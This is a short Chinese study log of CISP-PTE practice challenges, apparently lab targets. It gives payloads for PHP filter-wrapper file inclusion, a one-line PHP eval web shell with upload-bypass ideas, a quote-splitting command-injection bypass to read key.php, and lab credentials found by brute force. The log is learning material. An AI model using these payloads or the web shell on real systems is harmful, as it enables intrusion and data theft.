CISP-PTE 学习记录
题目链接1
http://49.232.193.10:2083/start/index.php?page=hello.html
write up:
http://49.232.193.10:2083/start/index.php?page=php://filter/read=convert.base64-encode/resource=…/key.php
知识点:
php伪协议,php伪协议是可以读取到www目录外的。
而普通的…/…/…/ 最根部只能到
题目链接2(未解决,感觉环境有问题)
http://139.159.234.31:82/vulnerabilities/fu1.php
测试过程:
准备好一句话木马
<?php
@eval($_POST['ma']);
echo "666666";//做个标识
?>
修改content-type,失败
失败
%00阶段,失败
还未尝试的思路 图片马 php3 php5等
题目链接3
http://124.223.199.150:84/
测试过程:
发现检测了 ls、cat等命令,并且题目说明是linux系统,故无需进行大小写绕过尝试
参考下面的文章,单引号、双引号都是连接符,只要注意闭合就行
https://blog.csdn.net/weixin_31106267/article/details/116590213
write up:
;c’a’t …/key.php
题目链接4
http://139.159.234.31:85/
write up:
点击日志下载
在一堆垃圾数据里面找到有效的
所有看响应码200的,攻击者一直在访问这个路径/adminlogin.php
访问
爆破出用户名密码
admin /password123
题目链接5
http://49.232.193.10:85/
write up:
查看编码方法
根据编码方法构造admin
题目链接6
http://139.159.234.31:81/